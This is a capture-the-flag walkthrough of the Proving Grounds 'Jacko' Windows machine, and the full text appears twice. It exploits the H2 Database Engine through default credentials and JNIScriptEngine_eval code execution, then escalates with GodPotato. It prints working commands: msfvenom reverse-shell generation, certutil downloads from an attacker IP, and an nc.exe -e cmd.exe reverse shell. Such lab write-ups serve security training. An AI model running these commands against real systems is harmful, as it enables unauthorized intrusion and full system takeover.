Jacko

PreviousSquid NextDVR4

Last updated 2 months ago

Jacko

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

I started with the usual autorecon and was hit with a slew of open ports: 80, 135, 139, 445, 5040, 8082, 9092, 49664 -> 49669
I began with port 80 as usual, which presented an interface for the H2 Database Engine.

Service Analysis

Checking online, I learned that H2 Database Engine has multiple vulnerabilities. Exploit DB with the ID, 49384 showed an exploit that allowed running Java code. I tried several automated PoCs with no luck. I kept searching for the correct method to interact with the engine, and it wasn’t until I checked port 8082 that I found the proper login page.

Gaining Initial Access

Using the default credentials, sa with an empty password, I was able to log in without issue.
Following the CVE details, I managed to run commands successfully.

However, when I attempted to upload my shell and get a reverse shell, nothing worked. I ended up reverting the machine over and over, and after a few frustrating hours away, the same commands worked on my return. OffSec servers, always keeping you on your toes.
I finally uploaded and executed my reverse shell using the following queries:

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=9911 #Generate Payload

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f 
http://192.168.45.170/shell.exe C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');
 
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');

Privilege Escalation

When I started checking privileges, running commands like whoami failed with the error: 'whoami' is not recognized as an internal or external command, operable program or batch file.

After searching, I discovered that the %PATH% environment variable was missing some key defaults. The issue was fixed after running:

set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

After that, checking privileges with whoami /priv confirmed I had SeImpersonatePrivilege, a huge relief that opened the door for escalation. I checked systeminfo and confirmed the system was Windows 10 x64, so I opted for GodPotato x64. I verified the .NET Framework version by running:

 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

which showed Version 4. Finally, I ran:

certutil -urlcache -split -f http://192.168.45.240/GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.240:901/nc.exe
.\GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.170 9101"

The first attempt failed for reasons I couldn’t pinpoint, but running GodPotato a second time succeeded, and I obtained a SYSTEM shell.

Lessons Learned

H2 Interface Discovery: Checking alternate ports (like 8082) can reveal key interfaces not visible on the default port and help you not waste your time.
Default Credentials: Always try the default credentials, here, sa with an empty password was all it took.
Persistence Pays Off: I don't know for this one, maybe hope that OffSec servers are having a good day?
Environment Variables: Ensure your %PATH% is correctly set to avoid command execution issues.
Privilege Escalation: Always check the privileges, Potatos are awesome!

PreviousSquid NextDVR4

Last updated 2 months ago

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

I started with the usual autorecon and was hit with a slew of open ports: 80, 135, 139, 445, 5040, 8082, 9092, 49664 -> 49669
I began with port 80 as usual, which presented an interface for the H2 Database Engine.

Service Analysis

Checking online, I learned that H2 Database Engine has multiple vulnerabilities. Exploit DB with the ID, 49384 showed an exploit that allowed running Java code. I tried several automated PoCs with no luck. I kept searching for the correct method to interact with the engine, and it wasn’t until I checked port 8082 that I found the proper login page.

Gaining Initial Access

Using the default credentials, sa with an empty password, I was able to log in without issue.
Following the CVE details, I managed to run commands successfully.

However, when I attempted to upload my shell and get a reverse shell, nothing worked. I ended up reverting the machine over and over, and after a few frustrating hours away, the same commands worked on my return. OffSec servers, always keeping you on your toes.
I finally uploaded and executed my reverse shell using the following queries:

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=9911 #Generate Payload

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f 
http://192.168.45.170/shell.exe C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');
 
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');

Privilege Escalation

When I started checking privileges, running commands like whoami failed with the error: 'whoami' is not recognized as an internal or external command, operable program or batch file.

After searching, I discovered that the %PATH% environment variable was missing some key defaults. The issue was fixed after running:

set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

After that, checking privileges with whoami /priv confirmed I had SeImpersonatePrivilege, a huge relief that opened the door for escalation. I checked systeminfo and confirmed the system was Windows 10 x64, so I opted for GodPotato x64. I verified the .NET Framework version by running:

 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

which showed Version 4. Finally, I ran:

certutil -urlcache -split -f http://192.168.45.240/GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.240:901/nc.exe
.\GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.170 9101"

The first attempt failed for reasons I couldn’t pinpoint, but running GodPotato a second time succeeded, and I obtained a SYSTEM shell.

Lessons Learned

H2 Interface Discovery: Checking alternate ports (like 8082) can reveal key interfaces not visible on the default port and help you not waste your time.
Default Credentials: Always try the default credentials, here, sa with an empty password was all it took.
Persistence Pays Off: I don't know for this one, maybe hope that OffSec servers are having a good day?
Environment Variables: Ensure your %PATH% is correctly set to avoid command execution issues.
Privilege Escalation: Always check the privileges, Potatos are awesome!